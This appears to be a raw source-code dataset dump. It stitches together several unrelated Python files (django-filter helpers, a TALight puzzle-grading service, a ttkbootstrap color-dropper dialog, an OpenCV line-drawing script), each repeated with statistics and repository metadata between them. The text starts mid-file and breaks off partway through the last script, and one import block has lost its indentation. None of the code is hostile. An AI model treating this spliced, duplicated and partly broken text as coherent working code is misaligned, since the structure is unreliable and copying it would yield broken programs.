    """
    Resolves a ``lookup_expr`` into its final output field, given
    the initial ``model_field``. The lookup expression should only contain
    transforms and lookups, not intermediary model field parts.
    Note:
        This method is based on django.db.models.sql.query.Query.build_lookup
        For more info on the lookup API:
        https://docs.djangoproject.com/en/1.9/ref/models/lookups/
    """
    query = model_field.model._default_manager.all().query
    lhs = Expression(model_field)
    lookups = lookup_expr.split(LOOKUP_SEP)
    assert len(lookups) > 0
    try:
        while lookups:
            name = lookups[0]
            # If there is just one part left, try first get_lookup() so
            # that if the lhs supports both transform and lookup for the
            # name, then lookup will be picked.
            if len(lookups) == 1:
                final_lookup = lhs.get_lookup(name)
                if not final_lookup:
                    # We didn't find a lookup. We are going to interpret
                    # the name as transform, and do an Exact lookup against
                    # it.
                    lhs = query.try_transform(lhs, name, lookups)
                    final_lookup = lhs.get_lookup('exact')
                return lhs.output_field, final_lookup.lookup_name
            lhs = query.try_transform(lhs, name, lookups)
            lookups = lookups[1:]
    except FieldError as e:
        # Re-raise as the package's own error type, chaining the cause.
        six.raise_from(FieldLookupError(model_field, lookup_expr), e)
def verbose_field_name(model, field_name):
    """
    Get the verbose name for a given ``field_name``. The ``field_name``
    will be traversed across relationships. Returns '[invalid name]' for
    any field name that cannot be traversed.
    ex::
        >>> verbose_field_name(Article, 'author__name')
        'author name'
    """
    if field_name is None:
        return '[invalid name]'
    parts = get_field_parts(model, field_name)
    if not parts:
        return '[invalid name]'
    # Reverse relations expose ``related_name``; everything else has a
    # ``verbose_name``.
    names = [
        part.related_name if isinstance(part, ForeignObjectRel) else part.verbose_name
        for part in parts
    ]
    return ' '.join(names)
def verbose_lookup_expr(lookup_expr):
    """
    Get a verbose, more humanized expression for a given ``lookup_expr``.
    Each part in the expression is looked up in the ``FILTERS_VERBOSE_LOOKUPS``
    dictionary. Missing keys will simply default to itself.
    ex::
        >>> verbose_lookup_expr('year__lt')
        'year is less than'
        # with `FILTERS_VERBOSE_LOOKUPS = {}`
        >>> verbose_lookup_expr('year__lt')
        'year lt'
    """
    from .conf import settings as app_settings
    verbose_lookups = app_settings.VERBOSE_LOOKUPS or {}
    rendered = []
    for lookup in lookup_expr.split(LOOKUP_SEP):
        # Fall back to the (translated) raw lookup name when no verbose
        # mapping is configured for it.
        rendered.append(force_text(verbose_lookups.get(lookup, _(lookup))))
    return ' '.join(rendered)
def label_for_filter(model, field_name, lookup_expr, exclude=False):
    """
    Create a generic label suitable for a filter.
    ex::
        >>> label_for_filter(Article, 'author__name', 'in')
        'author name is in'
    """
    name = verbose_field_name(model, field_name)
    verbose_expression = [_('exclude'), name] if exclude else [name]
    # iterable lookups indicate a LookupTypeField, which should not be verbose
    if isinstance(lookup_expr, six.string_types):
        verbose_expression += [verbose_lookup_expr(lookup_expr)]
    verbose_expression = [force_text(part) for part in verbose_expression if part]
    verbose_expression = pretty_name(' '.join(verbose_expression))
    return verbose_expression
| 29.517391 | 86 | 0.661953 | import warnings
from django.conf import settings
from django.core.exceptions import FieldError
from django.db import models
from django.db.models.constants import LOOKUP_SEP
from django.db.models.expressions import Expression
from django.db.models.fields import FieldDoesNotExist
from django.db.models.fields.related import RelatedField, ForeignObjectRel
from django.utils import six, timezone
from django.utils.encoding import force_text
from django.utils.translation import ugettext as _
try:
from django.forms.utils import pretty_name
except ImportError: # Django 1.8
from django.forms.forms import pretty_name
from .compat import remote_field, remote_model
from .exceptions import FieldLookupError
def deprecate(msg, level_modifier=0):
    """Emit a DeprecationWarning for *msg*, pointing at the migration guide.

    ``level_modifier`` shifts the reported stack level for nested wrappers.
    """
    full_msg = (
        "%s See: https://django-filter.readthedocs.io/en/latest/migration.html"
        % msg
    )
    warnings.warn(full_msg, DeprecationWarning, stacklevel=3 + level_modifier)
def try_dbfield(fn, field_class):
    """
    Try ``fn`` with the DB ``field_class`` by walking its
    MRO until a result is found.
    ex::
        _try_dbfield(field_dict.get, models.CharField)
    """
    # walk the mro, as field_class could be a derived model field.
    for cls in field_class.mro():
        # skip if cls is models.Field
        if cls is models.Field:
            continue
        data = fn(cls)
        if data:
            return data
    # Implicitly returns None when no class in the MRO yields a result.
def get_all_model_fields(model):
    """Return the names of *model*'s concrete and many-to-many fields,
    excluding AutoFields and parent-link relations."""
    opts = model._meta
    return [
        f.name for f in sorted(opts.fields + opts.many_to_many)
        if not isinstance(f, models.AutoField) and
        not (getattr(remote_field(f), 'parent_link', False))
    ]
def get_model_field(model, field_name):
    """
    Get a ``model`` field, traversing relationships
    in the ``field_name``.
    Returns None when the expression cannot be traversed.
    ex::
        f = get_model_field(Book, 'author__first_name')
    """
    fields = get_field_parts(model, field_name)
    return fields[-1] if fields else None
def get_field_parts(model, field_name):
    """
    Get the field parts that represent the traversable relationships from the
    base ``model`` to the final field, described by ``field_name``.
    ex::
        >>> parts = get_field_parts(Book, 'author__first_name')
        >>> [p.verbose_name for p in parts]
        ['author', 'first name']
    """
    parts = field_name.split(LOOKUP_SEP)
    opts = model._meta
    fields = []
    # walk relationships
    for name in parts:
        try:
            field = opts.get_field(name)
        except FieldDoesNotExist:
            # Any unresolvable part invalidates the whole expression.
            return None
        fields.append(field)
        # Hop to the related model's meta: forward relations via the remote
        # model, reverse relations via ``related_model``.
        if isinstance(field, RelatedField):
            opts = remote_model(field)._meta
        elif isinstance(field, ForeignObjectRel):
            opts = field.related_model._meta
    return fields
def resolve_field(model_field, lookup_expr):
    """
    Resolves a ``lookup_expr`` into its final output field, given
    the initial ``model_field``. The lookup expression should only contain
    transforms and lookups, not intermediary model field parts.
    Note:
        This method is based on django.db.models.sql.query.Query.build_lookup
        For more info on the lookup API:
        https://docs.djangoproject.com/en/1.9/ref/models/lookups/
    """
    query = model_field.model._default_manager.all().query
    lhs = Expression(model_field)
    lookups = lookup_expr.split(LOOKUP_SEP)
    assert len(lookups) > 0
    try:
        while lookups:
            name = lookups[0]
            # If there is just one part left, try first get_lookup() so
            # that if the lhs supports both transform and lookup for the
            # name, then lookup will be picked.
            if len(lookups) == 1:
                final_lookup = lhs.get_lookup(name)
                if not final_lookup:
                    # We didn't find a lookup. We are going to interpret
                    # the name as transform, and do an Exact lookup against
                    # it.
                    lhs = query.try_transform(lhs, name, lookups)
                    final_lookup = lhs.get_lookup('exact')
                return lhs.output_field, final_lookup.lookup_name
            lhs = query.try_transform(lhs, name, lookups)
            lookups = lookups[1:]
    except FieldError as e:
        # Re-raise as the package's own error type, chaining the cause.
        six.raise_from(FieldLookupError(model_field, lookup_expr), e)
def handle_timezone(value):
    """Coerce *value*'s awareness to match ``settings.USE_TZ``: make naive
    datetimes aware (default zone) under USE_TZ, otherwise strip tzinfo
    via UTC from aware ones."""
    if settings.USE_TZ and timezone.is_naive(value):
        return timezone.make_aware(value, timezone.get_default_timezone())
    elif not settings.USE_TZ and timezone.is_aware(value):
        return timezone.make_naive(value, timezone.UTC())
    return value
def verbose_field_name(model, field_name):
    """
    Get the verbose name for a given ``field_name``. The ``field_name``
    will be traversed across relationships. Returns '[invalid name]' for
    any field name that cannot be traversed.
    ex::
        >>> verbose_field_name(Article, 'author__name')
        'author name'
    """
    if field_name is None:
        return '[invalid name]'
    parts = get_field_parts(model, field_name)
    if not parts:
        return '[invalid name]'
    names = []
    for part in parts:
        # Reverse relations expose ``related_name``; everything else has a
        # ``verbose_name``.
        if isinstance(part, ForeignObjectRel):
            names.append(part.related_name)
        else:
            names.append(part.verbose_name)
    return ' '.join(names)
def verbose_lookup_expr(lookup_expr):
    """
    Get a verbose, more humanized expression for a given ``lookup_expr``.
    Each part in the expression is looked up in the ``FILTERS_VERBOSE_LOOKUPS``
    dictionary. Missing keys will simply default to itself.
    ex::
        >>> verbose_lookup_expr('year__lt')
        'year is less than'
        # with `FILTERS_VERBOSE_LOOKUPS = {}`
        >>> verbose_lookup_expr('year__lt')
        'year lt'
    """
    # Imported lazily to avoid a circular import with the package config.
    from .conf import settings as app_settings
    VERBOSE_LOOKUPS = app_settings.VERBOSE_LOOKUPS or {}
    lookups = [
        force_text(VERBOSE_LOOKUPS.get(lookup, _(lookup)))
        for lookup in lookup_expr.split(LOOKUP_SEP)
    ]
    return ' '.join(lookups)
def label_for_filter(model, field_name, lookup_expr, exclude=False):
    """
    Create a generic label suitable for a filter.
    ex::
        >>> label_for_filter(Article, 'author__name', 'in')
        'author name is in'
    """
    name = verbose_field_name(model, field_name)
    verbose_expression = [_('exclude'), name] if exclude else [name]
    # iterable lookups indicate a LookupTypeField, which should not be verbose
    if isinstance(lookup_expr, six.string_types):
        verbose_expression += [verbose_lookup_expr(lookup_expr)]
    verbose_expression = [force_text(part) for part in verbose_expression if part]
    verbose_expression = pretty_name(' '.join(verbose_expression))
    return verbose_expression
| 679 | 0 | 69 |
4917a993e949da8613ed9d7462ad21e579c8654e | 2,406 | py | Python | example_problems/tutorial/magic_index/services/eval_play1_server.py | romeorizzi/TALight | 2b694cb487f41dd0d36d7aa39f5c9c5a21bfc18e | [
"MIT"
] | 4 | 2021-06-27T13:27:24.000Z | 2022-03-24T10:46:28.000Z | example_problems/tutorial/magic_index/services/eval_play1_server.py | romeorizzi/TALight | 2b694cb487f41dd0d36d7aa39f5c9c5a21bfc18e | [
"MIT"
] | 1 | 2021-01-23T06:50:31.000Z | 2021-03-17T15:35:18.000Z | example_problems/tutorial/magic_index/services/eval_play1_server.py | romeorizzi/TALight | 2b694cb487f41dd0d36d7aa39f5c9c5a21bfc18e | [
"MIT"
] | 5 | 2021-04-01T15:21:57.000Z | 2022-01-29T15:07:38.000Z | #!/usr/bin/env python3
from sys import stderr, exit
import re
from TALinputs import TALinput
from multilanguage import Env, Lang, TALcolors
from magic_indexes_lib import *
# METADATA OF THIS TAL_SERVICE:
# Service arguments: the final array, the player's chosen indexes, the
# declared goal, and the feedback verbosity.
args_list = [
    ('config',str),
    ('moves',str),
    ('goal',str),
    ('feedback',str)
]
ENV =Env(args_list)
TAc =TALcolors(ENV)
LANG=Lang(ENV, TAc, lambda fstring: eval(f"f'{fstring}'"))
# START CODING YOUR SERVICE:
final_configuration = ENV['config'].split(',')
indexes = ENV['moves'].split(',')
vector_len = len(final_configuration)
# this vector contains -1,0,1 and it's filled by the server with the worst case scenario and it's never shown to the user during the game.
server_vector = [None] * vector_len
# this variable contains the questions made by the user during the game
wasted_dollars = 0
# this boolean variable is initialized to True in case ENV['feedback'] == 'spot_first_gift'
firstGift = True
TAc.print(LANG.render_feedback("random_vector", f'All right, let us evaluate your moves...'), "yellow", ["bold"])
# Replay the player's moves, grading each one against the optimal strategy.
# get_positions_f applies while no '0' is known, get_positions_g afterwards
# (strategies come from magic_indexes_lib — confirm semantics there).
for n_move in range(0,len(final_configuration)):
    chosen_index = int(indexes[n_move])
    if '0' not in server_vector:
        unknown, optimal_pos = get_positions_f(server_vector)
        if chosen_index != optimal_pos:
            if ENV['feedback'] == 'spot_first_gift' and firstGift:
                TAc.print(LANG.render_feedback("first error", f'# Here you made your first mistake!'), "yellow", ["bold"])
                firstGift = False
            elif ENV['feedback'] == 'spot_every_gift':
                TAc.print(LANG.render_feedback("error", f'# Here you made a mistake!'), "yellow", ["bold"])
    else:
        unknown, optimal_pos = get_positions_g(server_vector)
        if chosen_index not in optimal_pos:
            if ENV['feedback'] == 'spot_first_gift' and firstGift:
                TAc.print(LANG.render_feedback("first error", f'# Here you made your first mistake!'), "yellow", ["bold"])
                firstGift = False
            elif ENV['feedback'] == 'spot_every_gift':
                TAc.print(LANG.render_feedback("error", f'# Here you made a mistake!'), "yellow", ["bold"])
    update_server_vec(chosen_index, final_configuration[chosen_index],server_vector)
    wasted_dollars += 1
# Compare the number of spent questions against the theoretical minimum.
min_questions = f(vector_len)
check_goal_eval(ENV['goal'], ENV['feedback'],wasted_dollars, min_questions, TAc, LANG)
| 33.887324 | 138 | 0.671654 | #!/usr/bin/env python3
from sys import stderr, exit
import re
from TALinputs import TALinput
from multilanguage import Env, Lang, TALcolors
from magic_indexes_lib import *
# METADATA OF THIS TAL_SERVICE:
# Service arguments: the final array, the player's chosen indexes, the
# declared goal, and the feedback verbosity.
args_list = [
    ('config',str),
    ('moves',str),
    ('goal',str),
    ('feedback',str)
]
ENV =Env(args_list)
TAc =TALcolors(ENV)
LANG=Lang(ENV, TAc, lambda fstring: eval(f"f'{fstring}'"))
# START CODING YOUR SERVICE:
final_configuration = ENV['config'].split(',')
indexes = ENV['moves'].split(',')
vector_len = len(final_configuration)
# this vector contains -1,0,1 and it's filled by the server with the worst case scenario and it's never shown to the user during the game.
server_vector = [None] * vector_len
# this variable contains the questions made by the user during the game
wasted_dollars = 0
# this boolean variable is initialized to True in case ENV['feedback'] == 'spot_first_gift'
firstGift = True
TAc.print(LANG.render_feedback("random_vector", f'All right, let us evaluate your moves...'), "yellow", ["bold"])
# Replay the player's moves, grading each one against the optimal strategy.
# get_positions_f applies while no '0' is known, get_positions_g afterwards
# (strategies come from magic_indexes_lib — confirm semantics there).
for n_move in range(0,len(final_configuration)):
    chosen_index = int(indexes[n_move])
    if '0' not in server_vector:
        unknown, optimal_pos = get_positions_f(server_vector)
        if chosen_index != optimal_pos:
            if ENV['feedback'] == 'spot_first_gift' and firstGift:
                TAc.print(LANG.render_feedback("first error", f'# Here you made your first mistake!'), "yellow", ["bold"])
                firstGift = False
            elif ENV['feedback'] == 'spot_every_gift':
                TAc.print(LANG.render_feedback("error", f'# Here you made a mistake!'), "yellow", ["bold"])
    else:
        unknown, optimal_pos = get_positions_g(server_vector)
        if chosen_index not in optimal_pos:
            if ENV['feedback'] == 'spot_first_gift' and firstGift:
                TAc.print(LANG.render_feedback("first error", f'# Here you made your first mistake!'), "yellow", ["bold"])
                firstGift = False
            elif ENV['feedback'] == 'spot_every_gift':
                TAc.print(LANG.render_feedback("error", f'# Here you made a mistake!'), "yellow", ["bold"])
    update_server_vec(chosen_index, final_configuration[chosen_index],server_vector)
    wasted_dollars += 1
# Compare the number of spent questions against the theoretical minimum.
min_questions = f(vector_len)
check_goal_eval(ENV['goal'], ENV['feedback'],wasted_dollars, min_questions, TAc, LANG)
| 0 | 0 | 0 |
90ce9593ef75ba940c71128b9b153e7ed4868e38 | 6,715 | py | Python | src/ttkbootstrap/dialogs/colordropper.py | 745404527/ttkbootstrap | 692d780cf178dc2a3a7f55953f17899248f3fbae | [
"MIT"
] | 2 | 2022-01-23T01:48:38.000Z | 2022-01-24T00:30:58.000Z | src/ttkbootstrap/dialogs/colordropper.py | 745404527/ttkbootstrap | 692d780cf178dc2a3a7f55953f17899248f3fbae | [
"MIT"
] | null | null | null | src/ttkbootstrap/dialogs/colordropper.py | 745404527/ttkbootstrap | 692d780cf178dc2a3a7f55953f17899248f3fbae | [
"MIT"
] | 1 | 2022-03-19T08:47:08.000Z | 2022-03-19T08:47:08.000Z | """
NOTE: https://stackoverflow.com/questions/25467288/pils-imagegrab-is-capturing-at-the-wrong-resolution
!! This widget is not currently supported on Mac OS
"""
import tkinter as tk
import ttkbootstrap as ttk
from ttkbootstrap.constants import *
from ttkbootstrap import colorutils, utility
from PIL import ImageGrab, ImageTk, Image
from collections import namedtuple
# Named result: the picked color expressed in rgb, hsl, and hex form.
ColorChoice = namedtuple('ColorChoice', 'rgb hsl hex')
class ColorDropperDialog:
    """A widget that displays an indicator and a zoom window for
    selecting a color on the screen.

    Left-click the mouse button to select a color. The result is
    stored in the `result` property as a `ColorChoice` tuple which
    contains named fields for rgb, hsl, and hex color models.

    Zoom in and out on the zoom window by using the mouse wheel.

    This widget is implemented for **Windows** and **Linux** only.

    !!! warning "high resolution displays"
        This widget may not function properly on high resolution
        displays if you are not using the application in high
        resolution mode. This is enabled automatically on Windows.
    """

    def __init__(self):
        # Fullscreen screenshot toplevel; created lazily in `show()`.
        # FIX: this initializer was missing, so `self.result` did not
        # exist when `on_left_click` tried to set it.
        self.toplevel: ttk.Toplevel = None
        # Set to a ColorChoice(rgb, hsl, hex) tuple on left-click.
        self.result = ttk.Variable()

    def build_screenshot_canvas(self):
        """Grab the whole screen and display it on a canvas that fills
        the fullscreen toplevel so the user can pick any pixel."""
        self.screenshot_canvas = ttk.Canvas(
            self.toplevel, cursor='tcross', autostyle=False)
        self.screenshot_data = ImageGrab.grab()
        self.screenshot_image = ImageTk.PhotoImage(self.screenshot_data)
        self.screenshot_canvas.create_image(
            0, 0, image=self.screenshot_image, anchor=NW)
        self.screenshot_canvas.pack(fill=BOTH, expand=YES)

    def build_zoom_toplevel(self, master):
        """Build the borderless toplevel that shows a magnified view of
        the pixels underneath the mouse cursor.

        Parameters:
            master: the parent (screenshot) toplevel.
        """
        height = utility.scale_size(self.toplevel, 100)
        width = utility.scale_size(self.toplevel, 100)
        text_xoffset = utility.scale_size(self.toplevel, 50)
        text_yoffset = utility.scale_size(self.toplevel, 50)
        toplevel = ttk.Toplevel(master)
        toplevel.transient(master)
        if self.toplevel.winsys == 'x11':
            # on x11 a tooltip-type window drops the decorations
            toplevel.attributes('-type', 'tooltip')
        else:
            toplevel.overrideredirect(True)
        toplevel.geometry(f'{width}x{height}')
        toplevel.lift()
        self.zoom_canvas = ttk.Canvas(
            toplevel, borderwidth=1, height=self.zoom_height, width=self.zoom_width)
        self.zoom_canvas.create_image(0, 0, tags=['image'], anchor=NW)
        # "+" marker at the canvas center; its fill is updated for contrast
        self.zoom_canvas.create_text(
            text_xoffset, text_yoffset, text="+", fill="white", tags=['indicator'])
        self.zoom_canvas.pack(fill=BOTH, expand=YES)
        self.zoom_toplevel = toplevel

    def on_mouse_wheel(self, event: tk.Event):
        """Zoom in and out on the image underneath the mouse.

        TODO Cross platform testing needed
        """
        winsys = self.toplevel.winsys.lower()
        if winsys == 'win32':
            delta = -int(event.delta / 120)
        elif winsys == 'aqua':
            delta = -event.delta
        elif event.num == 4:  # x11 scroll up
            delta = -1
        elif event.num == 5:  # x11 scroll down
            delta = 1
        else:
            # FIX: previously `delta` was unbound here, raising
            # UnboundLocalError on unrecognized wheel events.
            delta = 0
        # FIX: clamp so the crop box in on_mouse_motion never inverts
        self.zoom_level = max(1, self.zoom_level + delta)
        self.on_mouse_motion()

    def on_left_click(self, _):
        """Capture the color underneath the mouse cursor, store it in
        `result`, and destroy the dropper windows.

        Returns:
            The selected ColorChoice tuple.
        """
        hx = self.get_hover_color()
        hsl = colorutils.color_to_hsl(hx)
        rgb = colorutils.color_to_rgb(hx)
        self.result.set(ColorChoice(rgb, hsl, hx))
        self.toplevel.destroy()
        self.zoom_toplevel.destroy()
        self.toplevel.grab_release()
        return self.result.get()

    def on_right_click(self, _):
        """Close the color dropper without saving any color information."""
        self.zoom_toplevel.destroy()
        self.toplevel.grab_release()
        self.toplevel.destroy()

    def on_mouse_motion(self, event=None):
        """Track the mouse: move the zoom window beside the cursor and
        refresh its magnified image and indicator color.

        Parameters:
            event: motion event; when None the pointer position is
                queried directly (initial draw and after zooming).
        """
        if event is None:
            x, y = self.toplevel.winfo_pointerxy()
        else:
            x = event.x
            y = event.y
        # move snip window beside the cursor
        self.zoom_toplevel.geometry(
            f'+{x+self.zoom_xoffset}+{y+self.zoom_yoffset}')
        # crop a (2*zoom_level+1) square around the cursor and scale it up
        bbox = (x-self.zoom_level, y-self.zoom_level,
                x+self.zoom_level+1, y+self.zoom_level+1)
        size = (self.zoom_width, self.zoom_height)
        self.zoom_data = self.screenshot_data.crop(
            bbox).resize(size, Image.BOX)
        self.zoom_image = ImageTk.PhotoImage(self.zoom_data)
        self.zoom_canvas.itemconfig('image', image=self.zoom_image)
        # recolor the "+" indicator so it stays visible on the hover color
        hover_color = self.get_hover_color()
        contrast_color = colorutils.contrast_color(hover_color, 'hex')
        self.zoom_canvas.itemconfig('indicator', fill=contrast_color)

    def get_hover_color(self):
        """Return the hex color of the pixel under the zoom indicator."""
        x1, y1, x2, y2 = self.zoom_canvas.bbox('indicator')
        x = x1 + (x2-x1)//2
        # FIX: was `(y2-y2)//2` (always 0), which sampled the top edge
        # of the indicator's bbox instead of its vertical center.
        y = y1 + (y2-y1)//2
        r, g, b = self.zoom_data.getpixel((x, y))
        hx = colorutils.color_to_hex((r, g, b))
        return hx

    def show(self):
        """Take a screenshot, show it fullscreen, and start the dropper.

        Grabs input until a color is picked (left-click) or the dialog
        is cancelled (right-click)."""
        self.toplevel = ttk.Toplevel(alpha=1)
        self.toplevel.wm_attributes('-fullscreen', True)
        self.build_screenshot_canvas()

        # event binding
        self.toplevel.bind("<Motion>", self.on_mouse_motion, "+")
        self.toplevel.bind("<Button-1>", self.on_left_click, "+")
        self.toplevel.bind("<Button-3>", self.on_right_click, "+")
        if self.toplevel.winsys.lower() == 'x11':
            # x11 reports wheel scrolling as button 4/5 presses
            self.toplevel.bind("<Button-4>", self.on_mouse_wheel, "+")
            self.toplevel.bind("<Button-5>", self.on_mouse_wheel, "+")
        else:
            self.toplevel.bind("<MouseWheel>", self.on_mouse_wheel, "+")

        # initial snip setup
        self.zoom_level = 2
        self.zoom_toplevel: ttk.Toplevel = None
        self.zoom_data = None
        self.zoom_image = None
        self.zoom_height = utility.scale_size(self.toplevel, 100)
        self.zoom_width = utility.scale_size(self.toplevel, 100)
        self.zoom_xoffset = utility.scale_size(self.toplevel, 10)
        self.zoom_yoffset = utility.scale_size(self.toplevel, 10)
        self.build_zoom_toplevel(self.toplevel)

        self.toplevel.grab_set()
        self.toplevel.lift('.')
        self.zoom_toplevel.lift(self.toplevel)
        self.on_mouse_motion()
| 39.269006 | 106 | 0.639464 | """
NOTE: https://stackoverflow.com/questions/25467288/pils-imagegrab-is-capturing-at-the-wrong-resolution
!! This widget is not currently supported on Mac OS
"""
import tkinter as tk
import ttkbootstrap as ttk
from ttkbootstrap.constants import *
from ttkbootstrap import colorutils, utility
from PIL import ImageGrab, ImageTk, Image
from collections import namedtuple
ColorChoice = namedtuple('ColorChoice', 'rgb hsl hex')
class ColorDropperDialog:
    """A widget that displays an indicator and a zoom window for
    selecting a color on the screen.

    Left-click the mouse button to select a color. The result is
    stored in the `result` property as a `ColorChoice` tuple which
    contains named fields for rgb, hsl, and hex color models.

    Zoom in and out on the zoom window by using the mouse wheel.

    This widget is implemented for **Windows** and **Linux** only.

    !!! warning "high resolution displays"
        This widget may not function properly on high resolution
        displays if you are not using the application in high
        resolution mode. This is enabled automatically on Windows.
    """

    def __init__(self):
        # Fullscreen screenshot toplevel; created lazily in `show()`.
        self.toplevel: ttk.Toplevel = None
        # Set to a ColorChoice(rgb, hsl, hex) tuple on left-click.
        self.result = ttk.Variable()

    def build_screenshot_canvas(self):
        """Grab the whole screen and display it on a canvas that fills
        the fullscreen toplevel so the user can pick any pixel."""
        self.screenshot_canvas = ttk.Canvas(
            self.toplevel, cursor='tcross', autostyle=False)
        self.screenshot_data = ImageGrab.grab()
        self.screenshot_image = ImageTk.PhotoImage(self.screenshot_data)
        self.screenshot_canvas.create_image(
            0, 0, image=self.screenshot_image, anchor=NW)
        self.screenshot_canvas.pack(fill=BOTH, expand=YES)

    def build_zoom_toplevel(self, master):
        """Build the borderless toplevel that shows a magnified view of
        the pixels underneath the mouse cursor.

        Parameters:
            master: the parent (screenshot) toplevel.
        """
        height = utility.scale_size(self.toplevel, 100)
        width = utility.scale_size(self.toplevel, 100)
        text_xoffset = utility.scale_size(self.toplevel, 50)
        text_yoffset = utility.scale_size(self.toplevel, 50)
        toplevel = ttk.Toplevel(master)
        toplevel.transient(master)
        if self.toplevel.winsys == 'x11':
            # on x11 a tooltip-type window drops the decorations
            toplevel.attributes('-type', 'tooltip')
        else:
            toplevel.overrideredirect(True)
        toplevel.geometry(f'{width}x{height}')
        toplevel.lift()
        self.zoom_canvas = ttk.Canvas(
            toplevel, borderwidth=1, height=self.zoom_height, width=self.zoom_width)
        self.zoom_canvas.create_image(0, 0, tags=['image'], anchor=NW)
        # "+" marker at the canvas center; its fill is updated for contrast
        self.zoom_canvas.create_text(
            text_xoffset, text_yoffset, text="+", fill="white", tags=['indicator'])
        self.zoom_canvas.pack(fill=BOTH, expand=YES)
        self.zoom_toplevel = toplevel

    def on_mouse_wheel(self, event: tk.Event):
        """Zoom in and out on the image underneath the mouse.

        TODO Cross platform testing needed
        """
        winsys = self.toplevel.winsys.lower()
        if winsys == 'win32':
            delta = -int(event.delta / 120)
        elif winsys == 'aqua':
            delta = -event.delta
        elif event.num == 4:  # x11 scroll up
            delta = -1
        elif event.num == 5:  # x11 scroll down
            delta = 1
        else:
            # FIX: previously `delta` was unbound here, raising
            # UnboundLocalError on unrecognized wheel events.
            delta = 0
        # FIX: clamp so the crop box in on_mouse_motion never inverts
        self.zoom_level = max(1, self.zoom_level + delta)
        self.on_mouse_motion()

    def on_left_click(self, _):
        """Capture the color underneath the mouse cursor, store it in
        `result`, and destroy the dropper windows.

        Returns:
            The selected ColorChoice tuple.
        """
        hx = self.get_hover_color()
        hsl = colorutils.color_to_hsl(hx)
        rgb = colorutils.color_to_rgb(hx)
        self.result.set(ColorChoice(rgb, hsl, hx))
        self.toplevel.destroy()
        self.zoom_toplevel.destroy()
        self.toplevel.grab_release()
        return self.result.get()

    def on_right_click(self, _):
        """Close the color dropper without saving any color information."""
        self.zoom_toplevel.destroy()
        self.toplevel.grab_release()
        self.toplevel.destroy()

    def on_mouse_motion(self, event=None):
        """Track the mouse: move the zoom window beside the cursor and
        refresh its magnified image and indicator color.

        Parameters:
            event: motion event; when None the pointer position is
                queried directly (initial draw and after zooming).
        """
        if event is None:
            x, y = self.toplevel.winfo_pointerxy()
        else:
            x = event.x
            y = event.y
        # move snip window beside the cursor
        self.zoom_toplevel.geometry(
            f'+{x+self.zoom_xoffset}+{y+self.zoom_yoffset}')
        # crop a (2*zoom_level+1) square around the cursor and scale it up
        bbox = (x-self.zoom_level, y-self.zoom_level,
                x+self.zoom_level+1, y+self.zoom_level+1)
        size = (self.zoom_width, self.zoom_height)
        self.zoom_data = self.screenshot_data.crop(
            bbox).resize(size, Image.BOX)
        self.zoom_image = ImageTk.PhotoImage(self.zoom_data)
        self.zoom_canvas.itemconfig('image', image=self.zoom_image)
        # recolor the "+" indicator so it stays visible on the hover color
        hover_color = self.get_hover_color()
        contrast_color = colorutils.contrast_color(hover_color, 'hex')
        self.zoom_canvas.itemconfig('indicator', fill=contrast_color)

    def get_hover_color(self):
        """Return the hex color of the pixel under the zoom indicator."""
        x1, y1, x2, y2 = self.zoom_canvas.bbox('indicator')
        x = x1 + (x2-x1)//2
        # FIX: was `(y2-y2)//2` (always 0), which sampled the top edge
        # of the indicator's bbox instead of its vertical center.
        y = y1 + (y2-y1)//2
        r, g, b = self.zoom_data.getpixel((x, y))
        hx = colorutils.color_to_hex((r, g, b))
        return hx

    def show(self):
        """Take a screenshot, show it fullscreen, and start the dropper.

        Grabs input until a color is picked (left-click) or the dialog
        is cancelled (right-click)."""
        self.toplevel = ttk.Toplevel(alpha=1)
        self.toplevel.wm_attributes('-fullscreen', True)
        self.build_screenshot_canvas()

        # event binding
        self.toplevel.bind("<Motion>", self.on_mouse_motion, "+")
        self.toplevel.bind("<Button-1>", self.on_left_click, "+")
        self.toplevel.bind("<Button-3>", self.on_right_click, "+")
        if self.toplevel.winsys.lower() == 'x11':
            # x11 reports wheel scrolling as button 4/5 presses
            self.toplevel.bind("<Button-4>", self.on_mouse_wheel, "+")
            self.toplevel.bind("<Button-5>", self.on_mouse_wheel, "+")
        else:
            self.toplevel.bind("<MouseWheel>", self.on_mouse_wheel, "+")

        # initial snip setup
        self.zoom_level = 2
        self.zoom_toplevel: ttk.Toplevel = None
        self.zoom_data = None
        self.zoom_image = None
        self.zoom_height = utility.scale_size(self.toplevel, 100)
        self.zoom_width = utility.scale_size(self.toplevel, 100)
        self.zoom_xoffset = utility.scale_size(self.toplevel, 10)
        self.zoom_yoffset = utility.scale_size(self.toplevel, 10)
        self.build_zoom_toplevel(self.toplevel)

        self.toplevel.grab_set()
        self.toplevel.lift('.')
        self.zoom_toplevel.lift(self.toplevel)
        self.on_mouse_motion()
| 78 | 0 | 27 |
0d1ec9c67649b422c7054d5aa5bb72e17cf3a3f7 | 534 | py | Python | line.py | srnthsrdhrn/VehicleTrackingGUI | a18d890176de7547d557dfe7cc18dd37afa37411 | [
"MIT"
] | null | null | null | line.py | srnthsrdhrn/VehicleTrackingGUI | a18d890176de7547d557dfe7cc18dd37afa37411 | [
"MIT"
] | null | null | null | line.py | srnthsrdhrn/VehicleTrackingGUI | a18d890176de7547d557dfe7cc18dd37afa37411 | [
"MIT"
] | 1 | 2020-01-13T08:43:57.000Z | 2020-01-13T08:43:57.000Z | import numpy as np
import cv2
#from sort.py import rama
import time

# Copy the source clip to an annotated output: a red horizontal counting
# line plus a "CAR" label is drawn on every frame.
cap = cv2.VideoCapture('Night.mp4')
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter('output.avi', fourcc, 20.0, (1280, 720))
while cap.isOpened():
    ret, frame = cap.read()
    if not ret:
        # FIX: end of stream (or a failed read) returns frame=None;
        # without this guard cv2.line crashed on the final iteration.
        break
    frame = cv2.line(frame, (100, 360), (1200, 360), (0, 0, 255), 6)
    font = cv2.FONT_HERSHEY_SIMPLEX
    frame = cv2.putText(frame, ('CAR'), (10, 500), font, 4, (255, 255, 255), 2, cv2.LINE_AA)
    out.write(frame)
    cv2.imshow('frame', frame)
    if cv2.waitKey(25) == ord('q'):
        break
# FIX: release capture/writer handles and close the preview window so
# the output file is finalized properly.
cap.release()
out.release()
cv2.destroyAllWindows()
| 21.36 | 84 | 0.664794 | import numpy as np
import cv2
#from sort.py import rama
import time

# Copy the source clip to an annotated output: a red horizontal counting
# line plus a "CAR" label is drawn on every frame.
cap = cv2.VideoCapture('Night.mp4')
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter('output.avi', fourcc, 20.0, (1280, 720))
